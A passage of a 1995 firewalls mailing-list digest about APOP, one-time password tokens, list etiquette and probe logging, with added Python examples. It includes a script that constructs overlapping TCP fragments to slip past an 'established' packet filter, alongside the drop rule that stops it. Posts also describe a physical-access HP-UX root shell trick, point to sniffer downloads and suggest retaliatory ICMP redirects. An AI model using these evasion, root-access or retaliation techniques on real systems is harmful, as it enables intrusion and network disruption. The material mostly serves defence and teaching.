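    (the rules RFC 1858 later codified).  A first fragment of a TCP datagram
    too short to include the flags byte is dropped, and any fragment at byte
    offset 8 (fragment offset field == 1) is dropped because its only purpose
    can be to overwrite the ports/flags region of a legitimate first
    fragment.  The 16-byte threshold is this example's choice."""
    if frag.offset == 0 and len(frag.data) < min_first_fragment:
        return True
    return frag.offset == 8


def build_attack():
    """Constructed sample: A is the innocent-looking first fragment, B the
    overlapping second fragment that clears ACK and sets SYN."""
    honest = tcp_header(40000, 23, TCP_FLAG_ACK)
    evil = tcp_header(40000, 23, TCP_FLAG_SYN)
    frag_a = Fragment(0, honest, more=True)
    frag_b = Fragment(8, evil[8:], more=False)
    return frag_a, frag_b


if __name__ == "__main__":
    a, b = build_attack()
    for name, fn, order in [
        ("hole-filling, B then A", reassemble_hole_filling, [b, a]),
        ("hole-filling, A then B", reassemble_hole_filling, [a, b]),
        ("lowest-offset-wins, B then A", reassemble_lowest_offset_wins, [b, a]),
    ]:
        print(f"{name:30s} ACK set after reassembly: {passes_established_filter(fn(order))}")
    print("router drops fragment B up front:", firewall_should_drop(b))
```

Run stand-alone it prints which policy leaves ACK set. The lowest-offset rule is only enforceable by something that holds all fragments of a datagram before deciding, which a stateless filter does not; that is why the per-fragment drop rules are the practical answer on a router, and why a firewall that passes fragments without reassembling them cannot claim to enforce an "established" rule.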
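On Morrow Long's APOP answer above: an added example, not code from MH's popd or from any message in this digest, that runs both sides of the APOP exchange from RFC 1939 section 7, reproduces the RFC's own test vector (user mrose, secret tanstaaf), and shows why the per-connection timestamp makes a captured digest useless against the next connection. The hostname and the one-user secret table are constructed.

```python
"""APOP challenge/response as both sides see it (RFC 1939 section 7).

Added example; it is not code from MH's popd, from Eudora, or from any
message in this digest.  The server sends a one-time timestamp banner in
its greeting; the client answers with MD5(banner || shared secret) instead
of the password, so a sniffer on the path sees neither the secret nor a
value it could replay against a later connection.
"""
import hashlib
import hmac
import secrets
import time


def apop_digest(banner: str, shared_secret: str) -> str:
    """MD5 over the timestamp banner (angle brackets included) immediately
    followed by the shared secret, as 32 lowercase hex digits."""
    return hashlib.md5((banner + shared_secret).encode("ascii")).hexdigest()


def apop_client_line(greeting: str, user: str, shared_secret: str) -> str:
    """Client side: pull the <...> timestamp out of the +OK greeting and build
    the APOP command.  Raises ValueError if the server offered no timestamp."""
    start, end = greeting.index("<"), greeting.index(">") + 1
    return f"APOP {user} {apop_digest(greeting[start:end], shared_secret)}"


class ApopServer:
    """Server side, one instance per connection.  The cost of APOP shows here:
    the server must hold every user's secret in the clear to recompute the digest."""

    def __init__(self, hostname: str, secrets_db: dict):
        self.hostname = hostname
        self.secrets_db = secrets_db   # constructed user -> secret table
        self.banner = None

    def greet(self, banner: str = None) -> str:
        """The banner must be unique per connection; a fixed banner would turn a
        captured digest into a reusable password.  A caller may pass one in
        only so that a known test vector can be reproduced."""
        if banner is None:
            banner = f"<{secrets.randbelow(1 << 31)}.{int(time.time())}@{self.hostname}>"
        self.banner = banner
        return f"+OK POP3 server ready {banner}"

    def apop(self, line: str) -> str:
        parts = line.split()
        if self.banner is None or len(parts) != 3 or parts[0].upper() != "APOP":
            return "-ERR bad command"
        user, digest = parts[1], parts[2].lower()
        if len(digest) != 32 or any(c not in "0123456789abcdef" for c in digest):
            return "-ERR permission denied"
        secret = self.secrets_db.get(user)
        # Unknown users go through the same hashing and compare so that timing
        # does not reveal which names exist.
        expected = apop_digest(self.banner, secret if secret is not None else "")
        if secret is None or not hmac.compare_digest(expected, digest):
            return "-ERR permission denied"
        self.banner = None             # one challenge, one answer
        return f"+OK maildrop for {user} ready"


def run_session(server: ApopServer, user: str, shared_secret: str, banner: str = None):
    """Drive one greeting/APOP exchange and return the three wire lines."""
    greeting = server.greet(banner)
    command = apop_client_line(greeting, user, shared_secret)
    return greeting, command, server.apop(command)


if __name__ == "__main__":
    # RFC 1939's worked example: user mrose, secret tanstaaf, this banner.
    server = ApopServer("dbc.mtview.ca.us", {"mrose": "tanstaaf"})
    for wire in run_session(server, "mrose", "tanstaaf", "<1896.697170952@dbc.mtview.ca.us>"):
        print(wire)
```

Two caveats a practitioner would want. APOP is challenge/response, not a one-time password list: the server must keep each user's secret recoverable, and a sniffer who captures one greeting/digest pair can try offline guesses of the secret against MD5. It does, however, keep the password off the wire and defeat replay, which is the problem lyndond asked about.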
From firewalls-owner Thu May 11 22:39:21 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08090 for firewalls-outgoing; Thu, 11 May 1995 22:26:01 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08085 for ; Thu, 11 May 1995 22:25:59 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9nF2-0000JYC; Thu, 11 May 95 22:26 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA25079; Thu, 11 May 1995 22:26:29 +0800 Date: Thu, 11 May 1995 22:26:29 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505120526.AA25079@brittany.oes.amdahl.com> To: firewalls@greatcircle.com Subject: Someone's feeding old articles back to firewalls Content-Length: 44 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Whoever's doing it please quit:) Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. 
Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Thu May 11 22:52:07 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA08131 for firewalls-outgoing; Thu, 11 May 1995 22:27:58 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA08126 for ; Thu, 11 May 1995 22:27:56 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s9nH2-0000JYC; Thu, 11 May 95 22:28 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA25088; Thu, 11 May 1995 22:28:30 +0800 Date: Thu, 11 May 1995 22:28:30 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505120528.AA25088@brittany.oes.amdahl.com> To: danielh@panbio.com Subject: Re: Liable for security Cc: firewalls@greatcircle.com Content-Length: 97 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You are feeding firewalls articles back to me and a group of other people. Please quit. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. 
Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/

From firewalls-owner Fri May 12 00:09:25 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09544 for firewalls-outgoing; Fri, 12 May 1995 00:03:49 -0700 Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09539 for ; Fri, 12 May 1995 00:03:44 -0700 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id RAA02199 for ; Fri, 12 May 1995 17:01:01 +1000 Received: from citecuf.citec.qld.gov.au(147.132.176.10) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma002197; Fri May 12 17:00:41 1995 Received: from jaykay.citec.qld.gov.au (jaykay.citec.qld.gov.au [131.242.4.117]) by citecuf.citec.qld.gov.au (8.6.10/8.6.10) with SMTP id RAA02352 for ; Fri, 12 May 1995 17:03:40 +1000 Message-Id: <199505120703.RAA02352@citecuf.citec.qld.gov.au> From: "John Kidston" To: firewalls@GreatCircle.com Date: Fri, 12 May 1995 17:05:50 +10:0 Subject: Proxy aware ftp client for Mac Reply-to: j.kidston@citec.qld.gov.au Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hello all, Does anyone know of a Macintosh ftp client that will work transparently with a TIS Toolkit ftp-gw? Any help will be much appreciated. Thanks in advance John Kidston j.kidston@citec.qld.gov.au CITEC voice: +61 7 2222356 fax: +61 7 2277890 317 Edward Street, Brisbane 4000, Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "My opinions and CITEC's are not always the same."
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Fri May 12 00:39:24 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09614 for firewalls-outgoing; Fri, 12 May 1995 00:14:08 -0700 Received: from hearnvax.nic.surfnet.nl (hearnvax.nic.surfnet.nl [192.87.5.131]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09609 for ; Fri, 12 May 1995 00:14:04 -0700 Received: from MinOCW.nl (mowmx001.MinOCW.nl) by HEARNVAX.nic.SURFnet.nl (PMDF V4.2-12 #3330) id <01HQESAY69LS0091EX@HEARNVAX.nic.SURFnet.nl>; Fri, 12 May 1995 09:14:22 +0200 (MET-DST) Received: from [145.67.148.3] by MinOCW.nl (4.1/SMI-4.1) id AA16683; Fri, 12 May 95 09:16:42 EDT Date: Fri, 12 May 1995 09:12:10 +0000 (GMT) From: "Marco.Heemskerk" Subject: Re: Digital's Firewall In-reply-to: Your message of Thu, 11 May 1995 09:24:16 -2359.<95051109241611@jasper.mcclellan.af.mil> To: mokbelsa@jasper.mcclellan.af.MIL Cc: firewalls@greatcircle.COM Message-id: <9505121316.AA16683@MinOCW.nl> X-Envelope-to: firewalls@greatcircle.COM Content-transfer-encoding: 7BIT Encoding: 18 TEXT , 36 MESSAGE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, If anybody sends info to mokbelsa, can he/she cc it to me? I'm also interested in Digital's firewall. Thanks! Marco Heemskerk __________________________________________________________________ M.B.L. Heemskerk RCC, Zoetermeer, the Netherlands Tel: 0031-79534789 Fax: 0031-79523189 __________________________________________________________________ 'It's the nineties, and thanks to the Internet, the whole world now can read what some nerd thinks about Star-Trek......' 
(Homer Simpson)

>From firewalls-owner@GreatCircle.COM Thu May 11 20:14:55 1995 Return-Path: Received: from relay3.UU.NET ([192.48.96.8]) by MinOCW.nl (4.1/SMI-4.1) id AA15534; Thu, 11 May 95 20:14:55 EDT Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQyphg12342; Thu, 11 May 1995 14:02:06 -0400 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA21011 for firewalls-outgoing; Thu, 11 May 1995 09:36:32 -0700 Received: from JASPER.MCCLELLAN.AF.MIL (jasper.mcclellan.af.mil [137.243.167.242]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA21001 for ; Thu, 11 May 1995 09:36:27 -0700 From: mokbelsa@jasper.mcclellan.af.mil Date: Thu, 11 May 1995 09:24:16 -2359 Message-Id: <95051109241611@jasper.mcclellan.af.mil> To: firewalls@greatcircle.com Subject: Digital's Firewall X-Vms-To: SMTP%"firewalls@greatcircle.com" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status:

Hi all, Has anybody worked with DEC's internet firewall system? If so:
- what do you think of it in terms of manageability, reliability, flexibility..?
- how easy is it to add new application proxies to it?
- any observations that you think are important?
You can Email me directly if you wish at: mokbelsa@jasper.mcclellan.af.mil Thanks for any replies.
Sam Mokbel Network Consultant

From firewalls-owner Fri May 12 01:09:27 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09954 for firewalls-outgoing; Fri, 12 May 1995 00:40:40 -0700 Received: from ford.gbnet.org (ford.gbnet.org [192.188.96.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09949 for ; Fri, 12 May 1995 00:40:36 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.6.12/8.6.12) id IAA29541; Fri, 12 May 1995 08:40:52 +0100 From: Steve Kennedy Message-Id: <199505120740.IAA29541@ford.gbnet.org> Subject: Re: password backdoors To: kimminau@Mail.Coast.NET (Eric Kimminau) Date: Fri, 12 May 1995 08:40:52 +0100 (BST) Cc: firewalls@greatcircle.com In-Reply-To: from "Eric Kimminau" at May 11, 95 08:21:51 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1329 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

According to Eric Kimminau
> > I am sure your HP engineer was just boasting, I am sure there are no
> > 'password backdoors' in Domain/OS. However, Domain/OS (as installed by
> > default) has many other security holes which allow anyone (preferably with
> > physical access) to do anything they like. Even though this is a full
> > disclosure list, I would prefer not to elaborate on how to exploit these
> > holes, but rather point you to a set of scripts which close most (all?) of
> > them:
> It's very possible to boot an HPUX box as root if you have physical access
> to the machine, power off, power on, let fsck begin, power off, power on.
> Single user fsck root shell.

They got rid of this one ... You could also do clever things from the ISL> prompt ... And of course if you built an Emergency Boot tape (or whatever HP called it) you could boot from the tape (a memory file system etc), mount the real disks and presto ...
Steve
--
home steve@gbnet.org  * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU
work steve@demon.net  * tel +44-(0)171 483 1169  FAX +44-(0)181 444 6103
www  http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500
bits steve@gbnet.net  * GSM data @2400 0802-449500 @9600 449501 fax 449502
Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk)

From firewalls-owner Fri May 12 05:09:55 1995
Date: Fri, 12 May 95 07:41:36 EDT
To: firewalls@greatcircle.com
From: mckenney@smiley.mitre.org (Brian W. McKenney)
Subject: fyi: Gobbler Locations

Host brother.cc.monash.edu.au
  Location: /copy/dnpap.et.tudelft.nl
    DIRECTORY drwxr-xr-x   512 Jan 22 1992 Gobbler
Host dutiws.twi.tudelft.nl
  Location: /pub/other_sites/.dutepp0/Fergie/old.hi.a
    DIRECTORY drwxrwxr-x   512 Oct  3 1993 Gobbler
Host ftp.sunet.se
  Location: /pub/network/monitoring/Fergie/old.hi.a
    DIRECTORY drwxrwxr-x  8192 May  9 1994 Gobbler

----
From: ralph@omni.mpsisys.com (Ralph Mitchell)
Subject: Re: Gobbler
To: mckenney@smiley.mitre.org (Brian W. McKenney)
Date: Thu, 11 May 1995 16:18:00 -0500 (CDT)

> A while back, Christopher Klaus (cklaus@iss.net) posted a FAQ file on
> Sniffers. He noted that the Gobbler sniffer is available for DOS machines.
> Does anyone know where this is available on the Internet (e.g., FTP site)?
> I did ask Christopher, but he did not have a location.

This is extracted from the ls-lR on UUNET:

  systems/ibmpc/msdos/wattcp/delft:
  total 524
  -rw-rw-r--  1 archive    1004 Feb 28  1992 READ.ME
  -rw-rw-r--  1 archive  159204 Feb 28  1992 beholder.zip
  -rw-rw-r--  1 archive  118934 Feb 28  1992 gobbler.zip
  -rw-rw-r--  1 archive    4661 Oct 11 17:01 ne2.com.Z
  -rw-rw-r--  1 archive    7062 Oct 11 17:01 ne2000.com.Z
  -rw-rw-r--  1 archive    6947 Oct 11 17:01 ne2100.com.Z
  -rw-rw-r--  1 archive  204093 Feb 28  1992 sage.tar.Z

Enjoy !

Ralph Mitchell (System Administrator)
--
MPSI Inc., 8282 South Memorial Drive, Tulsa, Oklahoma 74133
Email: ralph@mpsisys.com  PHONE: 918-250-9611 x237  FAX: 918-254-8764
"Never underestimate the power of human stupidity" - Salvor Hardin, Foundation

From firewalls-owner Fri May 12 05:41:29 1995
From: Marek Michalkiewicz
Message-Id: <199505121226.OAA01675@i17linuxb.ists.pwr.wroc.pl>
Subject: What's up?
To: danielh@panbio.com
Date: Fri, 12 May 1995 14:26:38 +0200 (MET DST)
Cc: firewalls@greatcircle.com

Could you explain to me what's up?
I am getting many mail messages like this, and I don't want them (because
they fill up my mailbox - messages from the firewalls mailing list are
placed in the right folder by procmail, but messages like the one below are
not - I don't know how procmail could distinguish this from a private mail
message). Maybe something wrong happened to the mailing list software?

This message looks like it is from me, but I never sent a message with such
a long "To:" list. My original message was sent to the author of the message
about the Linux bug, and Cc: firewalls@greatcircle.com.

Thanks in advance for any help, and sorry about my ignorance if this is a
feature, not a bug :-).

Regards,
--
Marek Michalkiewicz

> From danielh@panbio.com Fri May 12 04:36:33 1995
> X-Sender: danielh@pangea.panbio.com (Unverified)
> Message-Id:
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Thu, 11 May 1995 19:33:26 +0900
> To: nto2584@tserver.dsac.dla.mil (Steven Payne),
>     patrick@oes.amdahl.com (Patrick Horgan), Alan Hannan ,
>     Danny Boulet , vin@shore.net (Vin McLellan),
>     toreh , "Michael L. Sapp" ,
>     bret@real.com (Bret McDanel), "Ken Paquette" ,
>     Marek Michalkiewicz ,
>     Christopher Klaus ,
>     Brent@GreatCircle.COM (Brent Chapman), jcarroll@wellspring.us.dg.com,
>     Dan Schlitt ,
>     "Marcus J. Ranum" , John_Reinke@pcmailgw.ml.com
> From: Marek Michalkiewicz (by way of
>     danielh@pangea.panbio.com (Dan Hillman))
> Subject: Re: Linux as multi-homed firewall...
> (fwd)

[snip]

From firewalls-owner Fri May 12 06:09:56 1995
Date: Fri, 12 May 1995 05:55:15 -0700
Message-Id: <199505121255.FAA07558@ix5.ix.netcom.com>
From: tbudar@ix.netcom.com (Thomas Budar)
Subject: Changing The Firewalls Mailing List Name
To: firewalls@greatcircle.com

I have been reading this list for a couple of months and have seen the
topics drift away from firewalls to issues of legal liability to "I know
this should not be posted here but I have a question anyway..." Perhaps
it's time to change the name of the list to represent its evolving content.

Tom Budar

From firewalls-owner Fri May 12 06:40:11 1995
Message-Id: <9505121314.AA29512@wellspring.us.dg.com>
From: "Jim Carroll"
Organization: Data General (Canada) Inc.
To: long-morrow@CS.YALE.EDU (H Morrow Long), firewalls@greatcircle.com
Date: Fri, 12 May 1995 09:14:18 -0500
Subject: Re: Requesting "echo"
Reply-To: jcarroll@wellspring.us.dg.com

On 11 May 95 at 16:01, H Morrow Long was heard to utter:

> >2) How should a firewall respond when it receives a request for one of
> >these services and they are being denied?
>
>   o Log it.
>   o Notify network administration via E-Mail, pager, etc.
>   o Take pro-active defense measures such as send its own
>     nasty ICMP messages (such as ICMP network unreachables and
>     redirects for net 0 ) back to the source :-)

The first two are obvious to implement. I like the last option. Any way to
set this up to work automagically? I'm thinking in the context of the TIS
fwtk, with the DMZ choked off with a Cisco, which in turn logs to the bastion
host.

--
Jim Carroll - jcarroll@wellspring.us.dg.com
... the usual disclaimers ...
## If you like this sort of thing,         ##
## this is the sort of thing you'll like.  ##
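One way to make the first two responses (log it, notify someone) automatic, added here as an example that is not taken from the thread, the TIS fwtk or any product mentioned: a Python monitor that parses screend-style REJECT lines from the bastion host's syslog, groups them by source address and destination port, and emits one alert once a single source has hit a threshold of distinct inside hosts within a short window. The log lines are constructed in the format of the screend REJECT lines quoted in the "A Probe?" thread later on this page; the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the screend REJECT format quoted in the "A Probe?" thread, e.g.
#   May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7)
# The kernel "REJECT (IN): ... ulen 13 on eth0" variant is deliberately not matched here.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ screend\[\d+\]: REJECT: "
    r"(?P<proto>TCP|UDP) \[(?P<src>[\d.]+)\]->\[(?P<dst>[\d.]+)\]"
    r"\((?P<sport>\d+)->(?P<dport>\d+)\)"
)

# Constructed sample lines (not from the thread): one source hitting UDP/7 on several
# inside hosts within seconds, plus unrelated noise that must not trigger an alert.
SAMPLE_LOG = """\
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.71](2769->7)
May 10 20:54:11 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.17](2715->7)
May 10 20:54:12 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.18](2716->7)
May 10 20:54:12 gateway screend[4377]: REJECT: TCP [10.9.8.7]->[204.132.146.5](40001->25)
May 10 20:54:13 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.19](2717->7)
May 10 20:54:14 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.20](2718->7)
May 10 21:30:00 gateway screend[4377]: REJECT: UDP [204.240.1.23]->[204.132.146.21](2719->7)
"""


def parse_reject(line, year=1995):
    """Return a dict for a screend REJECT line, or None for any other line."""
    m = REJECT_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # syslog timestamps carry no year; an assumed year lets the lines be ordered
    rec["ts"] = datetime.strptime(f"{year} {rec['ts']}", "%Y %b %d %H:%M:%S")
    rec["sport"] = int(rec["sport"])
    rec["dport"] = int(rec["dport"])
    return rec


def find_sweeps(lines, min_hosts=4, window_seconds=60):
    """Flag (src, proto, dport) tuples that reached >= min_hosts distinct destinations
    inside a sliding window of window_seconds. Returns a list of alert dicts."""
    events = defaultdict(list)  # (src, proto, dport) -> [(ts, dst), ...]
    for line in lines:
        rec = parse_reject(line)
        if rec:
            events[(rec["src"], rec["proto"], rec["dport"])].append((rec["ts"], rec["dst"]))

    alerts = []
    for key, hits in events.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # shrink the window from the left until it spans at most window_seconds
            while (hits[end][0] - hits[start][0]).total_seconds() > window_seconds:
                start += 1
            targets = {dst for _, dst in hits[start:end + 1]}
            if len(targets) >= min_hosts:
                src, proto, dport = key
                alerts.append({"src": src, "proto": proto, "dport": dport,
                               "hosts": sorted(targets),
                               "first": hits[start][0], "last": hits[end][0]})
                break  # one alert per (src, proto, dport) is enough to page someone
    return alerts


def format_alert(alert):
    """Render an alert as the one-line summary that would go into mail or a pager message."""
    return (f"probe from {alert['src']}: {alert['proto']}/{alert['dport']} against "
            f"{len(alert['hosts'])} hosts between {alert['first']:%b %d %H:%M:%S} "
            f"and {alert['last']:%H:%M:%S}")


if __name__ == "__main__":
    for a in find_sweeps(SAMPLE_LOG.splitlines()):
        print(format_alert(a))
```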
From firewalls-owner Fri May 12 08:09:41 1995
Date: Fri, 12 May 1995 08:08:11 -0800
To: tbudar@ix.netcom.com (Thomas Budar)
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Changing The Firewalls Mailing List Name
Cc: mcb@GreatCircle.COM

At 05:55 5/12/95, Thomas Budar wrote:
>I have been reading this list for a couple of months and have seen the
>topics drift away from firewalls to issues of legal liability to "I
>know this should not be posted here but I have a question anyway..."
>Perhaps it's time to change the name of the list to represent its
>evolving content.

Oh, that's a very helpful suggestion. What a wonderful idea. Gee, why
didn't I think of that; that would solve everything. It's so obvious.

All right folks, I'm going to break the rules and talk about meta-issues.
This is NOT an invitation for discussion; if you feel you simply _have_ to
say something about this topic, say it to me and MCB@GreatCircle.COM
directly; MOST of the rest of the subscribers aren't interested, and posting
meta-discussions like this just makes things worse.

All mailing lists go through cycles. That's just the way it is. No list can
be low-volume, high-content on a continuous basis. Sometimes it's
low-volume, low-content; high-volume, high-content; or high-volume,
low-content. Right now, Firewalls happens to be high-volume, low-content.
Just relax, it'll get better soon; it always does.
And before somebody asks: no, I don't think Firewalls should be moderated,
except as it is now (i.e., on an occasional basis to squelch flame wars).
Many of the best discussions on Firewalls over the last couple of years have
been fast and furious quick-turnaround discussions on various topics. The
time lag involved in moderation would drastically change that dynamic, and
I think that might destroy the list.

So, if you don't like the volume, switch to the digest (send the commands
"subscribe firewalls-digest" and "unsubscribe firewalls" in the body of a
message to "Majordomo@GreatCircle.COM"). Or get a better mail reader that
can handle the volume. Or gateway Firewalls to a local newsgroup and use a
newsreader (a _local_ newsgroup, I said; a net-wide gatewayed Firewalls
newsgroup would almost certainly make the volume/content problems worse,
not better).

If you don't think you're getting enough useful out of the list, then
unsubscribe. Don't whine about it to the rest of us; we don't care, and
you're just making the problem worse. If you want, check back again in a
few weeks; maybe you'll find things more to your liking.
-Brent

----------------------------------------------------------------------
For info about the Internet Security Firewalls Tutorial and a schedule of
upcoming dates, please send email to Tutorial-Info@GreatCircle.COM
----------------------------------------------------------------------
Brent Chapman                            Great Circle Associates
Brent@GreatCircle.COM                    1057 West Dana Street
+1 415 962 0841                          Mountain View, CA 94041

From firewalls-owner Fri May 12 08:40:46 1995
From: Mohamed Ellozy
Message-Id: <199505121519.LAA20334@netman-mel.dfci.harvard.edu>
Subject: Comparative evaluations of firewall products?
To: firewalls@GreatCircle.COM
Date: Fri, 12 May 1995 11:19:32 -0400 (EDT)
Reply-To: ellozy@dfci.harvard.edu
X-Organization: Dana-Farber Cancer Institute

Are there any published comparative evaluations of firewall products? Is
anyone willing to share an unpublished evaluation with me?

Thanks.
Mohamed

From firewalls-owner Fri May 12 09:41:27 1995
From: peter@nmti.com (Peter da Silva)
Message-Id: <9505121514.AA26511@sonic.nmti.com.nmti.com>
Subject: Re: Changing The Firewalls Mailing List Name
To: tbudar@ix.netcom.com (Thomas Budar)
Date: Fri, 12 May 1995 10:14:23 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199505121255.FAA07558@ix5.ix.netcom.com> from "Thomas Budar" at May 12, 95 05:55:15 am

> I have been reading this list for a couple of months and have seen the
> topics drift away from firewalls to issues of legal liability to "I
> know this should not be posted here but I have a question anyway..."
> Perhaps it's time to change the name of the list to represent its
> evolving content.

This might be a better idea than creating a "firewalls-chat" list. The
"freebsd-hackers" list got split into "hackers" and "chat" and "hackers" is
still full of chat.

Or split it into "firewalls-technical" and "firewalls-political" with
everyone initially subscribed to both.
From firewalls-owner Fri May 12 10:14:55 1995
Message-Id: <9505121644.AA13053@istans.ansf.alcatel.fr>
From: "Kare Presttun"
Organization: Alcanet International
To: Firewalls@GreatCircle.COM
Date: Fri, 12 May 1995 18:43:19 CET
Subject: One time password tokens

The purpose of writing this was just to make the picture more complete
with adding history as a possible way of synchronizing.

> ------------------------------
>
> From: vin@shore.net (Vin McLellan)
> Date: Wed, 10 May 1995 16:49:05 -0500
> Subject: One Time Password Tokens
>
> Kare Presttun declared:
>
> >The correct statement is that there are two classes of tokens,
> >asynchronous and synchronous. The first one is what is called
> >challenge response. The second category contains two technologies,
> >time synchronous and history synchronous. The secure ID is time
> >synchronous, and the new tokens from Enigma Logic can operate in
> >both asynchronous and history synchronous mode (nice technology
> >Bob). The history synchronous technology does not have the drawback
> >that the password is valid within a time window.
>
> With respect, this stuff about a "history synchronous" token is
> marketing gobblygook.
>
> This is a repackaged technology Enigma first introduced on
> one of their big "squashed banana" tokens in the early 1980s and then
> withdrew -- I always thought -- because of its inherent security
> weaknesses. When cards became the rage, it came back.
>
> What we have here is a token which provides a sequential list of valid
> access codes upon demand. (Think of it as a Radio Shack version of the
> paper list of S/key codes you see guys pulling from their wallets at
> conventions.)

It is not. It contains a counter instead of the clock.

> Codes can thus be loaned to friends (a common problem) or punched
> out in advance so as to avoid carrying the token. With this technology --
> unlike Enigma's standard C/R token -- there is no requirement that the
> token be physically present when a valid access call is submitted to a
> server.

Wrong again, see above.

> (The whole idea behind a token is that -- as a tangible physical
> device required to implement the access process -- it can not be in more
> than one place at a time. This tech tosses the whole idea of a token into
> loonyland.)

Yes, you have to tie together something the user knows (PIN) with
something the user has (token). In general to have a strong system you
have to select two methods from two different classes of the tree:
something the user knows, something the user has, and something about the
user (biometrics). Common combinations are the way you look combined with
an ID card, or a PIN code combined with an ATM card.

> There are also some obvious potential problems in keeping the
> token's list and the server's list in synch. (In the original version,
> there was also a security issue in the way in which the server had to
> broaden the access window to search for a token out of sequential synch,
> but I forget the details.)
> Also, since you obviously can't feed a
> sequential list to more than one server, this is a one-machine logon device
> -- or, at least, it was with the original one-seed version.
>
> Enigma Logic makes several solid reliable products which perform as

Yes they do

> promised. I thought this one was a turkey ten years ago, and I think it is
> a turkey today. (Sorry, Bob;-) Anyone who thinks they can educate me,

I think it is ten years since you looked at their technology. If you want
to know what they do, take a look at their FTP server.

> or otherwise convince me that this is not a dangerous, silly, insecure
> product is welcome to add their 2 cents.
>
> $ 0.02
> Suerte,
>
> _Vin
>
> --
> Vin McLellan +The Privacy Guild+ USA
> Tel. (617) 884-5546  Mail: 53 Nichols St., Chelsea, Ma. 02150

Kare
================================================================
* Kare Presttun            Tel: +33 1 4058 5614                *
* Alcanet International    Fax: +33 1 4058 5945                *
* 33, rue Emeriau          Kare.Presttun@ansf.alcatel.fr       *
* F-75015 Paris                                                *
* France                                                       *
================================================================

From firewalls-owner Fri May 12 14:40:57 1995
From: Christopher Klaus
Message-Id: <199505122259.PAA12255@iss.net>
Subject: Firewall Marketplace
To: firewalls@greatcircle.com
Date: Fri, 12 May 1995 15:59:35 +1494730 (PDT)

Anyone have any statistics that
indicate the size of the firewall market? This may be extrapolated from how
many companies are connecting to the Internet daily. Are there any
statistics on that?

I believe Internic was getting close to 5000 domain name requests over a
2 week period? but I doubt that even comes close to how many companies are
actually connecting to the Internet each week.

Cheers,
Christopher

--
